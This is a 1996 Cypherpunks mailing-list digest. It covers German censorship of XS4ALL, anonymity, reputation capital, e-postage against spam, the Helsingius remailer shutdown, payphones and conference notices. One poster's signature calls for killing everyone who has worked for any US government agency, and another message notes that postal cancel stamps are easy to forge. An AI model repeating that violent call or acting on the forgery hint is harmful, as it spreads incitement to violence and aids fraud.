Chip Directory (http://www.xs4all.nl/~ganswijk/chipdir/). XS4ALL has not received any request from the German Government regarding the homepage of Radikal. Without any prior contact the German prosecutor decided that the XS4ALL website needs to be blocked for German Internet Users. XS4ALL is awaiting legal advice, and will investigate if legal procedures against the German government are possible. Censorship on Internet usually has the opposite effect. Internetusers consider it a sport to publish censored materials. Many users have already published the Radikal website on other Internet hosts. Here are some of the URL's: http://burn.ucsd.edu/%7Eats/RADIKAL/ http://www.jca.or.jp/~taratta/mirror/radikal/ http://www.serve.com/~spg/ http://huizen.dds.nl/~radikal http://www.canucksoup.net/radikal/index.html http://www.ecn.org/radikal http://www.well.com/~declan/mirrors/ http://www.connix.com/~harry/radikal/index.htm http://www.xs4all.nl/~tank/radikal/index.htm Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl to ensure that it's 3100 userpages will all remain available for any internet-user. -- Felipe Rodriquez - XS4ALL Internet - finger felipe at xs4all.nl for http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 pgp Key fingerprint = 32 36 C3 D9 02 42 79 C6 D1 9F 63 EB A7 30 8B 1A From fletch at ain.bls.com Fri Sep 6 04:59:39 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Fri, 6 Sep 1996 19:59:39 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: <322E94B9.41C67EA6@systemics.com> Message-ID: <9609051411.AA28025@outland> > numbers, and alias the lot on their web site - this would increase the > number of blocked addresses needed. It might also be a good idea to run > some proxies on unusual ports (eg. smtp, DNS, pop, ftp ports) (although > of course this will then need to be a dedicated proxy machine) - again > this would increase the size of the blacklist that the Germans must use, Of course if they're simply denying all traffic to a given network, a different port isn't going to make any difference. :) > and may involve some awkward router programming (for example, a router > might be configured to allow all DNS traffic - if a proxy is sitting on > the DNS port, then things get a bit difficult to set up). Of course, > netscape probably won't allow use of these ports (it certainly doesn't > allow the use of port 79). I think the restriction on port 79 (the finger daemon port) was because there still are a lot of fingerd's with buffer overrun holes and it was just too easy to use netscape to exploit them. Jeff or another of the people from NS probably can give the full explanation. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From schmidt at pin.de Fri Sep 6 05:08:03 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 20:08:03 +0800 Subject: Herr Schmidt In-Reply-To: Message-ID: > (I also don't dislike Germans in general. I studied some German in high > school--don't ask me to use it, though!--and have visited Germany. They > just have a certain well-known tendency to take the authoritarian path at > times.) Agreed :) I talked to someone about censorship here in Germany and we both think there is not much around. Germans are always amused when american film stars come to a German tv show and ask if they can use words like fuck on tv. Or the beeps in some songs on mtv Europe. The only big 'censorship' in Germany concerns extrem left and right wing texts etc (e.g. 'Ausschwitzluege', which is, when someone says ausschwitz is a lie), because it's illegal to distribute such things. And some censorship is involved in selling video games, although the concept is often misunderstood in the US. Video Games are not censored and can be bought by adults. It's only prohibited to sell these things to kids. And to this 'Herr Schmidt': most of the people I know are amused about 'Anglos' using this Herr XXX (say on skyone, nbc, etc.) stuff, because no German uses this phrase in this way :) And I thought cypherpunks are more open, concerning some mails I received. I think I had to say this, so don't bother. -stephan PS: and to those who mailed : it`s stephan not stephen ;) From tcmay at got.net Fri Sep 6 05:50:17 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 6 Sep 1996 20:50:17 +0800 Subject: Metcalf and Other Net.Fogies Message-ID: I'm evolving a hunch that the problems we're seeing with "old fogies" denouncing the Net, and anonymity, and "smut on the Net," are part of a larger cultural issue. Namely, the familiar case of an older generation complaining about the sloth and sin of the younger generations. (Caveat: I'm 44, so I'm certainly a generation older than many of you, and am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor, Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was in college, I recall of course similar predictions of disaster. (And as it turned out, the predictions that promiscuity would lead to a disaster turned out to be partly correct, viz. AIDS.)) Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a few minutes ago. He repeated his prediction of an "Internet collapse" in 1996, based on overuse, on bad pricing models, on lack of controls, and on other concerns. It could be that the Dennings, Dysons, Kapors, etc. of the world are simply growing jaded with the Net and are projecting their own ennui in their comments that the Net may need to be controlled. This may come with age, as I'm sure the Kapor of 25 years ago would not have wanted President Nixon and Attorney-General Mitchell telling him what he could read and write. (In fairness, none of these folks listed have called for censorship. But all have expressed "concerns" of one sort or another. Not that discussing concerns is inappropriate--after all, we do it all the time. But I sense in many of their phrasings of concerns a stereotypical "old fogeyness" emerging.) Just a thought. Maybe the solution to the EFF problem is to "not trust anyone over 30." --Tim May (untrustable since 1981) We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Fri Sep 6 05:52:17 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 6 Sep 1996 20:52:17 +0800 Subject: Race Bit: C Message-ID: <199609060330.UAA27245@mail.pacifier.com> At 02:11 PM 9/5/96 +0000, jonathon wrote: >On Thu, 5 Sep 1996, Anonymous wrote: >> defunded 100%, IMO). Violence begats violence which begats even larger >> government, don't start us on that road -- leave me in peace. >If I understand you correctly, it is OK for a government to >institute violence against the residents of the land it claims >dominion over, but it is not acceptable for the inhabitants of >that piece of land to respond in self defence. I think Mr. Anonymous displays a mental crutch that you'll occasionally see: A person who, while he'll not quite admit defending the status quo, criticizes alternatives to it yet doesn't have a solution of his own. He says he wants to be left "in peace," forgetting that most people in the world today are NOT left in peace. The way I see it, the status quo doesn't come "pre-justified": It needs just as much a defense as any other proposal. Its main advantage is that it tends to be more understood that most hypotheticals, because it's been tested. Sadly, people tend to ignore its disadvantages, to to excess familiarity. Jim Bell jimbell at pacifier.com From grafolog at netcom.com Fri Sep 6 06:16:07 1996 From: grafolog at netcom.com (jonathon) Date: Fri, 6 Sep 1996 21:16:07 +0800 Subject: Race Bit: C In-Reply-To: <199609060330.UAA27245@mail.pacifier.com> Message-ID: On Thu, 5 Sep 1996, jim bell wrote: > The way I see it, the status quo doesn't come "pre-justified": It needs > just as much a defense as any other proposal. Its main advantage is that it > tends to be more understood that most hypotheticals, because it's been More understood, and just more accepted, because alternatives are hard to conceive, and even harder to popularize, without lots of red liquid running in the streets? xan jonathon grafolog at netcom.com On second thoughts, let's just terminate with extreme prejudice, each and every individual who has worked in any capacity for any part of any government agency in the us -- regardless of whether it was federal, state or local, and regardless of whether they were president, janitor, or clerk. All people in the employ of government agencies are death-dealers. From ponder at freenet.tlh.fl.us Fri Sep 6 06:23:16 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Fri, 6 Sep 1996 21:23:16 +0800 Subject: rc2 export limits.. In-Reply-To: <199609051547.LAA07458@jekyll.piermont.com> Message-ID: keywords: block cipher, Bruce Schneier, SHA, ITAR Thanks to Perry Metzger and Andrew Loewenstern for their responses to my question viz: Why is SHA export controlled? I should always check _Applied Cryptography_ first before I ask a question. And I guess now that I have two copies, I could leave the red one at the office and bring the blue one home. I didn't reply to Andrew Loewenstern and Perry Metzger separately, because I think they both read the list, and I think replying to both might be bad form in those cases where the person is known to read the list. on the subject of anonymity, maybe some folks have yet to understand the binary nature of it. If there are exceptions to anonymous writing that can be enforced against the writer, then it's over. Either others will be able to compel discovery of anonymous writers' True Names or they won't. If methods exist that permit writers to remain anonymous with very high degrees of assurance that their true identities will not be found out, then we will have anonymity. It's either one or the other. Anonymity can be used to produce hate speech, lies, posting of intellectual property, and other things that many of us would rather not see. But, that is the price of having anonymity where it is needed and valuable. From vznuri at netcom.com Fri Sep 6 06:33:18 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 6 Sep 1996 21:33:18 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: Message-ID: <199609051749.KAA12335@netcom20.netcom.com> TCM >>I think cpunks should hold the view that communication is a matter >>of mutual consent between sender and receiver. if a receiver says, >>"I don't want any anonymous messages", then should be able to block them. > >But this is precisely what nearly all of us have been arguing. Namely, that >the issue of anonymity vs. providing of True Names, is a matter of >_contract_ between parties, not something the government is justified in >sticking its nose into. well, I was satirizing the "extremist cpunk position" which is stronger than the above. I noticed you didn't use the cpunk four-letter-word, "we", but used a nearly equivalent construction. I have seen it repeated here often that somehow anonymity is some kind of a "right" that one should have in all kinds of different & important transactions, not merely on "cyberspace debate societies". I see here frequently the implication that *private*entities* that want to enforce identity in their own transactions are somehow implementing a corrupt, orwellian system. it sounded to me like that was all Dyson was advocating. also, I think you are being slightly disingenuous in masking your own and other cpunks major objections to traceability, with the above, "this is all we really want". what about situations where the government requires you to give a physical identity for some kind of a license etc? do you think there are no such valid situations? is there any role for a government whatsoever in CryptoAnarchist Utopia and if so, is there any situation in which demanding physical identity is reasonable? >No, Dyson said "Therefore I would favor allowing anonymity -- with some >form of traceability only under terms considerably stronger than what are >generally required for a wiretap." > >This implies a role for government, and concomitant restrictions on related >anonymity technologies, to provide traceability. So much for mutual >agreement between sender and recipient. it's clear Dyson hasn't totally thought out her position on anonymity. imho you are reading too much into her existing positions. because of your government paranoia, you assume that when someone says they want traceability, they are implying they want the government to enforce it in all situations. >(I have nothing against senders and recipients agreeing to use the services >of some third party in providing ultimate traceability. I'm not wild about >the U.S. Government being this third party, paid for by tax money, but so >long as it is not required, it's a minor concern to me. that's what something like what Dyson has been referring to would suggest to me. that is, that's exactly the system she sounded like she was loosely advocating. I surmise, though, >that use of the U.S. Government as a third party would not be optional, in >the schemes of Dyson, Denning, and others of that ilk.) Denning, yes; Dyson, I don't think so. remember Dyson has written extensively on the subject of "the end of copyright" in some very interesting essays and ideas. one major reason you would want to enforce traceability in cyberspace would be to prevent copyright infringement. so by attacking or "reforming" the concept of copyright, I'd say Dyson is very close to cpunk agendas and ideals from what I have loosely seen. there is something I've observed among extremists. by arguing for an extreme position, they tend to polarize the world and push away proposals that may actually benefit themselves in the long run. in other words, a system A that is "close" to their goals comes along, and if implemented would support them with some minor compromises. but the extremists, such as there are many on this list, say, "A is not good enough for us". but then the window of opportunity is closed, and all future proposals B, C, D, etc. are even worse and one may even get implemented. so it becomes very important to "know when to settle". extremists think that they are promoting their goals when they reject anything less than perfect, when in fact they may be sabotaging their own agenda in doing so. one example I have brought up before: the post office is setting up a digital signature system. it could be a good way for cpunks to educate the public, to get crypto to the masses, and to put in safeguards that prevent misuse and try to guarantee it will be voluntary. but intead they flame it as the beginning of Big Brother. the problem is the mindset that "if its associated with government, it is evil". this can be self-sabotaging. but again I'm arguing in subtleties that few here will grasp so I think I'll just quit while I'm behind From pstira at escape.com Fri Sep 6 06:45:10 1996 From: pstira at escape.com (pstira at escape.com) Date: Fri, 6 Sep 1996 21:45:10 +0800 Subject: What is the EFF doing exactly? In-Reply-To: Message-ID: Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there are less and less payphones, and all new ones installed, just about, are those yellow credit card phones. Not all of them, but it's now one for one, at least. =Millie= PS: i wrote a fiction book about this a few years ago -- i should have published. People could've said i was the next nostradamus. :( On Wed, 4 Sep 1996, Black Unicorn wrote: > On Wed, 4 Sep 1996, Vladimir Z. Nuri wrote: > > > > > jim bell > > >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many > > >decades, people have been able to walk up to a pay telephone at 3:00 AM and > > >make a harassing phone call to somebody, a "problem" which still exists and > > >no solution is being implemented for. > > Incidently, this is being "solved." > > In D.C. and Chicago the solution is to rip up the payphones and not permit > new ones to be installed. > > If anyone objects the officals responsible make a wide gesture and say "We > didn't take away your phones, CRIMINALS took away your phones." > > > amusing the way you phrase that-- you didn't say, "phone", but "pay > > phone". the statement used to hold in general for all "phones", but > > then caller id, caller blocking, etc. have been introduced that > > make this no longer true. so in a very real sense, anonymity in > > the phone system was considered a "problem" by some that has been > > "solved" or "modified" by some recent advancements. (yes, most people > > agree caller ID is an advancement). > > > > Yet today one can go out and rent a cell phone on the street, or even pay > for one's activation in cash up front without presenting any real identity > documents. > > The real question is this, what are you going to do to anihilate anonymous > communication, because if you think its harmful that's what you have to > do. > > -- > I hate lightning - finger for public key - Vote Monarchist > unicorn at schloss.li > > > From zaphoid at solgate.com Fri Sep 6 07:41:22 1996 From: zaphoid at solgate.com (Zaphoid _d00l) Date: Fri, 6 Sep 1996 22:41:22 +0800 Subject: No Subject Message-ID: <2.2.32.19960906120442.006a74b0@solgate.com> desubscribe From schmidt at pin.de Fri Sep 6 07:46:43 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 22:46:43 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: Message-ID: September 6th, 14:00 CET, I can still access the url via our ISP. -stephan From dee at cybercash.com Fri Sep 6 07:53:01 1996 From: dee at cybercash.com (Donald E. Eastlake 3rd) Date: Fri, 6 Sep 1996 22:53:01 +0800 Subject: Conservation Laws, Money, Engines, and Ontology (fwd) Message-ID: Suggest you look at draft-eastlake-internet-payment-*.txt in the IETF shadow directories. I don't think any one step will solve all our spam problems but I wouldn't mind spending, say, 5 cents for each real piece of mail I sent outside my company and if end machines charged 5 cents per piece of ouside mail received, I think spamming would be crippled. (Note that with bad guy lists, you could collect the money and then just throw away the mail.) Donald (not on cypherpunks) ===================================================================== Donald E. Eastlake 3rd +1 508-287-4877(tel) dee at cybercash.com 318 Acton Street +1 508-371-7148(fax) dee at world.std.com Carlisle, MA 01741 USA +1 703-620-4200(main office, Reston, VA) http://www.cybercash.com http://www.eff.org/blueribbon.html ---------- Forwarded message ---------- Date: Sun, 1 Sep 1996 19:47:15 -0400 From: Robert Hettinga To: dcsb at ai.mit.edu Subject: Conservation Laws, Money, Engines, and Ontology Date: Sun, 1 Sep 1996 11:35:28 -0700 Mime-Version: 1.0 To: cypherpunks at toad.com From: tcmay at got.net (Timothy C. May) Subject: Conservation Laws, Money, Engines, and Ontology Keywords: agoric systems, computational ecologies, resource auctioning, Mark Miller, K. Eric Drexler, Bernardo Huberman, contracts, distributed trust, metered usage, software objects, software ICs, superdistribution, Brad Cox, emergent order. In physics there are various conservation laws: conservation of energy, mass, charge, and whatnot. You all know about this... Conservation of mass says that mass is neither created nor destroyed. (For smart aleck quibblers, conservation of mass-energy.) How does this relate to our issues? "Abuse of Resources": Mail loops, infinite loops, spamming, overloads of networks, and congestion in general are cases where "unrealistic" models of costs are implemented in software. In the real physical world, infinite loops don't occur (at least not in the sense seen with mail loops, as a relevant example.) Conservation laws are related to the "cost model" of the universe. Real physical objects have costs, or ontological status, or presence.... (Please don't read too much into this point...I mean to be suggestive, not literal.) There are no "memory leaks" in the universe which suddenly fill it up with stuff, no perpetual motion machines, no creation and destruction of objects. Cyberspace Ontologies: There are several things which need to be done to make the cyberspatial world more like the spatial world: * payment for CPU cycles consumed (via contractual, permission-based access: "If you want access to this machine, here are the terms and conditions.") * metering mechanisms, such as e-stamps for e-mail (essentially a special case of the first point, where a machine says "I'll pass on your message if you pay me to.") * digital contracts, agreements on usage and payment (resource auctioning, or the "smart contracts" that Nick Szabo has written about) (you can all think of additional examples....) Cryptographic protocols have their uses here, but there are also some other measures which bear looking into. In the LISP community, for example, work has been done on "engines," which are building blocks that are "fueled up" with "CPU fuel" and allowed to run for some amount of CPU cycles. Thus, one could put an engine into a process and it would run for some number of ticks, then stop. (I'm sure there are Unix-level tools which do similar things, in terms of giving a spawned process so many ticks of the clock. The "engines" concept is somewhat more semantically clean, in that it's pushed down into the "ontology" of the thing being simulated or run, and is not at the "God level" (to use a non-technical term!).) Now, certainly I support the right of any person or machine to run programs freely and without charge, to pass on e-mail free of charge, to run remailers for no charge, to accept spam mail without complaint, and so on. What I'm suggesting is that many of the problems being seen with overuse of resources, spam, congestion, and denial of service are really due to a poor model of resource allocation. Unix and other modern operating systems offer various tools for helping to constrain such problems, but, I submit, better methods are needed. (Especially when multiple machines, networks, and even anonymous sites are part of the overall system....clearly the constraints must be managed locally, and via "contract," as part of a computational ecology, and not as a hierarchical, top down Unix-type operating system.) Economics is about the "allocation of scarce resources." Many of the existing models being used treat various scarce resources as _free_. Then, when the inevitable problems occur, calls for top-down regulation are heard (e.g., the frequent calls for illegalization of "unwanted mail"). In my view, building a consistent, distributed, "conservative" system is what Cypherpunks need to be thinking about. (I used the term "conservative" in the physics sense. A system in which various conservation laws are obeyed.) As I said before, this should not be compelled, but voluntary. However, those who give their resources away for free (choosing not to adopt a conservative ontology, in other words) should be in no position to complain or run to the government for top-down regulation because there freely-given resources are being overused or "abused" (in their thinking). And closely related to this whole issue--and something I've written about extensively--is the issue of "building walls in cyberspace." In the real world, persistent structures are build out of real materials, resulting in castles, forts, skyscrapers, bridges, houses, highways, etc. These objects have persistence, have controllable access (gates, doors, locks,...), and have "structural integrity." Cryptographic and distributed trust protocols are about the only means I can think of for constructing the equivalents in cyberspace. (And to a large extent, this is already happening: the Net and the Web have structure which cannot be demolished casually, or by top-down orders from any single national leader. Millions of machines, linked in various ways and implementing various protocols and "terms of service" with users and other machines....an early version of the "conservative" system I think we'll someday see.) Well, this gives the flavor of my points. I haven't rigorously argued all of the points, but the Cypherpunks forum is for presenting informal arguments. Thoughts? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To unsubscribe from this list, send a letter to: Majordomo at ai.mit.edu In the body of the message, write: unsubscribe dcsb Or, to subscribe, write: subscribe dcsb If you have questions, write to me at Owner-DCSB at ai.mit.edu From wb8foz at nrk.com Fri Sep 6 08:27:01 1996 From: wb8foz at nrk.com (David Lesher) Date: Fri, 6 Sep 1996 23:27:01 +0800 Subject: 16oz packages In-Reply-To: <199609051928.OAA19142@bigeasy.com> Message-ID: <199609061201.IAA04873@nrk.com> > One is now instructed to take these packages to a post-office mail > clerk for mailing. > > (Of course it's unclear just what would be done if a package > weighing over that magical 16ozs was left in a mailbox) They get sent back. Was in line @ USPS. Guy showed up with 40-odd Priority Mail Packages that had come back. Clerk stamped each one & off they went. 1) It was obvious from conversation the customer was a local. 2) The hand cancel stamp is TRIVIAL to forge. After all, until now, who has WANTED to falsely zero-out the value of her stamps? -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From sandfort at crl.com Fri Sep 6 10:37:08 1996 From: sandfort at crl.com (Sandy Sandfort) Date: Sat, 7 Sep 1996 01:37:08 +0800 Subject: BAY AREA PARTY REMINDER Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, We are at one week and counting until my Second Occasional Anarcho-Dilettante costume party. If you would like to attend please RSVP as soon as possible. If you did not get or keep the original invitation, let me know and I'll send you another copy. In addition to Cypherpunks and Extropians, there will be gun nuts, a contingent of Burning Man survivors and some total strangers. It will be one hell of a party. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From jbugden at smtplink.alis.ca Fri Sep 6 10:40:46 1996 From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca) Date: Sat, 7 Sep 1996 01:40:46 +0800 Subject: Anonymous phone calls (was: What is the EFF doing exactly?) Message-ID: <9608068420.AA842029748@smtplink.alis.ca> There is another spin possible on the reasons for replacement of pay phones with credit card phones. In Canada all new credit card phones are also able to take phone cards (which are anonymous). Using a prepaid phone card permits full anonymity. But what it also permits is metered local calls. This infrastructure would be more familiar to someone from Europe where metered local calls are the norm. Paris make the change to phones that *only* take prepaid phone cards (thus fully anonymous) obstensibly because people were breaking into phones for the money. Prepaid phone cards avoid this. James Why should my long distance calling subsidize your local internet access? ;-) ---------- From: "" Sent: Friday, September 06, 1996 9:54 AM To: unicorn at schloss.li Cc: vznuri at netcom.com; cypherpunks at toad.com Subject: Re: What is the EFF doing exactly? Not just DC and Chicago, I'm afraid. If anyone around NYC noticed, there are less and less payphones, and all new ones installed, just about, are those yellow credit card phones. Not all of them, but it's now one for one, at least. From omega at bigeasy.com Fri Sep 6 10:50:56 1996 From: omega at bigeasy.com (Omegaman) Date: Sat, 7 Sep 1996 01:50:56 +0800 Subject: Reputations Message-ID: <199609061407.JAA23700@bigeasy.com> > I don't see how there can be such a thing as negative reputation > capital. Wouldn't that mean B believes the opposite of what A says? If > you anti-believed someone in a consistent manner, couldn't they exploit > that? Of course they could exploit that. But you're not "anti-believing" the information an untrusted party is passing. Rather, you are not acting on their information in *any* fashion. You're ignoring them. In the case of the common killfile, you may not even know that they're talking at you. > Also, you are speaking only of 1-to-1 reputation-relationships. But that > is inefficient. The mere fact of having to evaluate each person's > reputation yourself is significant work. It is significant work. How much work depends on how valuable the transactions you are considering are to you. It's not as if the notion of reputation capital doesn't have precedent. When I make a purchase for my business, I do quite a bit of checking on the background of individuals and businesses I am purchasing from. The amount of reference work I do depends on how much I intend to spend. Furthermore, I am much more apt to do business with individuals who have been referred by other trusted parties (a transfer of raputation capital). Also my initial investment with a relative unknown is usually small. The repuatation capital of both parties increases relative to one another as a relationship is continued. > On the other hand, you could talk about the transmission of reputations. [..snip..] > For instance, when a certain infamously-low-reputation (deservedly so) > individual recently joined the cypherpunk lists, others who had endured > him in the past tried to relay their impressions of him. It proved very > difficult to convey, and they were somewhat attacked for their efforts > and not entirely believed. You seem to view the notion repuatation capital as absolute. It is relative to each user of it. The unnamed you are referring to did indeed come in with quite a bit of negative repuatation capital attached to his name. While I might regard the opinions of others on the list as being valuable, I chose to see for myself if the unnamed person warranted his bad repuation. > In other words, he *could not* spend down to 0, despite years of > unflagging effort. In other words, I decide if an when he has "spent down to zero" with me -- even if we never directly communicate. > Now, suppose J. Anonymous Gourmand spams all of Usenet, and millions of > people who have never heard of J. Anonymous Gourmand before read a > plausible but false account of the disgustingness of McDonald's food. > Perhaps the same detailed study, just fake. (Not to intertangle this > with other issues, let's further suppose that Ms. Gourmand sneaks in > underneath spam-watcher's radar, and cleverly appears to be on topic in > every group.) > > Nothing about her reputation has changed, but surely when her claim is > read by millions it will hurt McDonalds a non-trivial amount. Why? That depends on the sophistication of millions of Usenet readers (heh). I think your extension of this example is not useful. It's impossible not to "intermingle it with other issues" such as the substance of the message itself, the ability to verify any factual information, etc. etc. ad nauseam. Reputation is but one factor in many and has a mostly negative effect if J. Anonymous Goumand is indeed anonymous. Change J. Anonymous Gourmand to say, C. Everett Koop, and you can envision a more tangible example of reputation capital in action. me -------------------------------------------------------------- Omegaman PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63 Send a message with the text "get key" in the "Subject:" field to get a copy of my public key. -------------------------------------------------------------- From declan at well.com Fri Sep 6 10:51:24 1996 From: declan at well.com (Declan McCullagh) Date: Sat, 7 Sep 1996 01:51:24 +0800 Subject: U.K. cyberporn fearstorm, Singapore attacks Julf, from HotWired Message-ID: Sgt. Toby Tyler is actually a bit of a cypherpunk. He told me he "absolutely" supports anonymous remailers -- repressive governments in Asia and all that. He just doesn't think that many people will use 'em. -Declan ---------- Forwarded message ---------- Date: Fri, 6 Sep 1996 05:55:26 -0700 (PDT) From: Declan McCullagh To: fight-censorship at vorlon.mit.edu Subject: U.K. cyberporn fearstorm, Singapore attacks Julf, from HotWired [Also in today's Netizen on HotWired is a report from India on their Net-regulations and Brock in Muckraker on the White House's new "Key Recovery Initiative" anti-crypto legislation. Check out http://www.hotwired.com/ --Declan] ********** http://www.hotwired.com/netizen/96/36/index4a.html HotWired, The Netizen 6-8 Sept 96 Finnish Line by Declan McCullagh Washington, DC, 5 September Call it a cyberporn fear-storm: Splashed across the front page of the 25 August issue of the London Observer was a hysterical report naming Finnish pseudonymous remailer operator Julf Helsingius as the "man US police-experts charge with being at the hub of 90 percent of the child pornography on the Internet." The report continued: "'Somewhere between 75 and 90 percent of all the child pornography I see is supplied through this remailer,' said Toby Tyler of the FBI." That was enough to make Helsingius - already reeling under threats from the Singapore government and repeated legal attacks from the always-litigious Church of Scientology - pull the plug on his anon.penet.fi site last Friday. But in trying to milk the story, the Observer went too far. The "FBI investigator" the paper cited as their only support for the accusations doesn't exist. In truth, Tyler is a sergeant in California's San Bernardino sheriff's office, and he says the Observer intentionally misrepresented his identity and his statements. Tyler says "there's very little of the story I agree with," and the Observer took a conversation he had with a reporter "and selectively chose words that would mean what they wanted." [...] Helsingius blames the Observer for scaremongering. "It was quite clear that they were trying to create a story where there was none ... I quite clearly outlined why my server wasn't transmitting child porn," Helsingius said. "I stated that the Finnish police had investigated and found that it wasn't. These comments were ignored. They wanted to make a story so they made things up." [...] Still, a malicious front-page splash in the Observer isn't the full extent of Helsingius's troubles. Now he's also up against the Singapore government, which has demanded the identity of one of the users in his half-million-person database... The unknown user, who has the email address an511172 at anon.penet.fi, posted hundreds of messages to the soc.culture.singapore newsgroup under the name of "Lee Kwan Yew," the retired prime minister of Singapore. The messages are short and unimaginative, yet apparently are just enough to piss off the thin-skinned Singaporean officials. One post reads: "We are small and vulnerable. Without regulations, we will be like Hong Kong, oops, fuck, bad example, they are actually doing quite all right. - SM Lee Kwan Yew, Republic of Singapore." Now that a Finnish court recently ruled that the remailer's database could be breached in a Scientology case, Helsingius says he's not sure what might happen. In the meantime, he's stuck somewhere between a sensationalist British newspaper and a Singaporean government bent on silencing opposition. [...] Links from the article: Linkname: hysterical report in London Observer Filename: http://www.scallywag.com/obtext.htm Linkname: Singapore banning Web pages Filename: http://www.eff.org/~declan/global/sg/ Linkname: hundreds of messages pseudonymously posted Filename: http://www.eff.org/~declan/global/sg/anon.posts.090596.txt ### From stevenw at best.com Fri Sep 6 10:55:14 1996 From: stevenw at best.com (Steven Weller) Date: Sat, 7 Sep 1996 01:55:14 +0800 Subject: CFP 97: Burlingame, CA Message-ID: Forwadred from RISKS: ------------------------------ Date: Tue, 3 Sep 1996 12:37:14 -0700 (PDT) From: Bruce R Koball Subject: 7th Computers, Freedom, and Privacy THE SEVENTH CONFERENCE ON COMPUTERS, FREEDOM, AND PRIVACY Call for Participation San Francisco Airport Hyatt Regency Hotel Burlingame, California 11-14 March 1997 CFP97: Commerce & Community will be sponsored by the Association for Computing Machinery SIGCOM and SIGSAC. The host institutions will be Stanford University and the University of California at Berkeley. Co-sponsors and cooperating organizations include the ACM SIGCAS, the Electronic Frontier Foundation, the Center for Democracy and Technology, the Electronic Privacy Information Center, and the WELL. CFP97: Commerce & Community is the latest in a series of annual conferences assembling a diverse group of experts and advocates from the domains of technology, business, government, and academia to explore the evolution of information and communication technologies and public policy, and its effects on freedom and privacy in the United States and throughout the world. Past CFP sessions have discussed, debated -- and often anticipated -- issues of great social import. In this tradition, CFP97: Commerce & Community will examine the social and policy questions posed by: * the growth of electronic communities; * electronic commerce and the commercialization of cyberspace; * the problems of legal and regulatory control of the Net; * the interests of privacy and property in the electronic domain; * high-tech law enforcement and security concerns. The CFP97 Program Committee invites your suggestions for presentations on these or other important issues at the nexus of technology, business, public policy, freedom, and privacy. Proposals may be for individual talks, panel discussions, debates, moot courts, moderated, interactive sessions or other formats. Each proposal should be accompanied by a one-page statement describing the topic and format. Descriptions of multi-person presentations should include a list of proposed participants and session chair. Proposals should be sent by e-mail to cfp97 at cfp.org. If necessary, typewritten proposals may be sent to: CFP'97, 2210 Sixth Street, Berkeley, CA 94710. Please submit your proposal as soon as possible. The deadline for submissions is 1 October 1996. (Please note that we have extended our deadline for submissions) For more information on the Computers, Freedom and Privacy Conferences, as well as up-to-date announcements on CFP'97, please visit our Web page at: http://www.cfp.org ------------------------------ ------------------------------------------------------------------------- Steven Weller | Technology (n): | | A substitute for adulthood. stevenw at best.com | Popular with middle-aged men. From dthorn at gte.net Fri Sep 6 11:18:32 1996 From: dthorn at gte.net (Dale Thorn) Date: Sat, 7 Sep 1996 02:18:32 +0800 Subject: Neo-Nazis etc. Message-ID: <322F9867.7FEF@gte.net> Try to keep in mind that "Nazis" aren't skinheads and other troublemakers exactly, which is to say, those are the first people Hitler got rid of when he came to power. Real Nazis are/were bureaucrats; cold, calculating, bureaucratic. Do we know anyone like that? From gnu at toad.com Fri Sep 6 11:18:32 1996 From: gnu at toad.com (John Gilmore) Date: Sat, 7 Sep 1996 02:18:32 +0800 Subject: Sep 20th SF C'punks meeting: ITAR on trial Message-ID: <199609061051.DAA05601@toad.com> We're having another "Cypherpunks Dress-Up Day" on Friday, September 20th. Meet at the Federal Building in San Francisco, 450 Golden Gate Avenue, at 11:45AM, in high-quality business drag. [There will also be a regular Saturday meeting this month, on 